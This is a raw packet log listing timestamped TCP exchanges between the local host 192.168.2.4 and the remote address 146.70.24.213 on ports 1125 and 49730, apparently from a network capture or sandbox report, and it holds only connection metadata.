Oct 11, 2024 16:53:48.602279902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602293015 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.602313995 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602319002 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.602328062 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602339983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602366924 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602369070 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.602377892 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602391005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602406979 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.602428913 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.602551937 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602566957 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602581024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602616072 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.602696896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602809906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602819920 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602830887 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602840900 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602850914 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.602850914 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602863073 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602873087 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602878094 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.602895975 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.602968931 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602981091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602993011 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603017092 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.603025913 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603039026 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603039980 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.603051901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603064060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603075981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603075981 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.603091002 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603101969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603104115 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.603115082 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603137016 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.603153944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603159904 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.603169918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603180885 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603205919 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.603220940 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603230000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603250980 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603257895 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.603260994 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603285074 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.603420019 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603434086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603444099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603456020 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603462934 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.603473902 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.603487015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603496075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603506088 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603516102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603524923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603527069 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.603535891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603555918 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.603724003 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603734970 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603775024 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.603861094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603902102 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.603928089 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.603940964 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.604047060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.604058027 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.604068995 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.604082108 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.604087114 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.604105949 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.604120970 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.604281902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.604295969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.604307890 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.604321003 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.604335070 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.604357004 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.604414940 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.604427099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.604439974 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.604469061 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.604924917 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.604938030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.604949951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.604970932 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.604981899 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.605010033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605020046 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605029106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605037928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605047941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605057955 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.605068922 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.605154037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605199099 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.605257988 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605268002 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605277061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605282068 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605290890 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605299950 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605312109 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.605330944 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.605494976 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605504990 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605515003 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605550051 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.605583906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605596066 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605607033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605618954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605634928 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.605635881 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605645895 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.605648041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605660915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605673075 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.605693102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605699062 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.605706930 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605719090 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605731010 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605740070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.605746984 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.605777979 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.606146097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.606157064 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.606167078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.606198072 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.606218100 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.606235027 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.606246948 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.606256962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.606301069 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.606429100 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.606470108 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.693280935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.693300962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.693320036 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.693331957 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.693341017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.693351984 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.693365097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.693392038 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.693418980 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.693423986 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.693434000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.693447113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.693454027 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.693459988 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.693475962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.693485975 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.693519115 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.693597078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.693608999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.693654060 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.693928957 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.693938971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.693949938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.693974018 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.694047928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694057941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694067001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694077015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694086075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694088936 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.694113016 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.694128036 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.694158077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694168091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694178104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694186926 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694196939 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694205999 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.694206953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694237947 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.694258928 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.694276094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694288015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694298983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694309950 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694323063 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694333076 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.694336891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694350958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694353104 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.694366932 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694382906 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.694420099 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.694430113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694439888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694457054 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694466114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694470882 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694475889 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694478989 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.694483995 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694490910 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694593906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694598913 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.694607973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694653988 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.694725990 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694736958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694746017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694765091 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.694868088 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694878101 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694888115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694927931 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694937944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694938898 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.694952965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694966078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.694996119 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.695009947 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.695101976 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695115089 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695127010 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695138931 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695152044 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695152044 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.695164919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695178986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695182085 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.695197105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695207119 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695214033 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.695233107 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.695245028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695257902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695269108 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695280075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695292950 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695297956 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.695307016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695313931 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.695332050 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.695494890 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695512056 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695523024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695533037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695545912 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.695547104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695549965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695573092 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.695595026 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.695744038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695753098 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695763111 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695786953 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.695815086 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.695852041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695862055 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695871115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695882082 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.695895910 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.695914030 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.696001053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696012974 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696022987 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696033001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696046114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696049929 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.696058989 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696064949 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.696070910 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696093082 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696099997 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.696124077 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.696288109 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696300983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696312904 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696335077 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.696393013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696404934 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696415901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696427107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696429968 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.696439028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696444988 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.696472883 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696475029 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.696485996 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696500063 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696510077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696521997 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696527958 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.696533918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.696547031 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.696572065 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.697227955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.697242022 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.697253942 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.697295904 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.697340012 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.697386980 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.697398901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.697411060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.697417974 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.697447062 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.742572069 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.784384012 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784418106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784435034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784446955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784461021 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784473896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784487963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784502029 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.784544945 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784547091 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.784555912 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784565926 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784575939 CEST	1125	49730	146.70.24.213	192.168.2.4
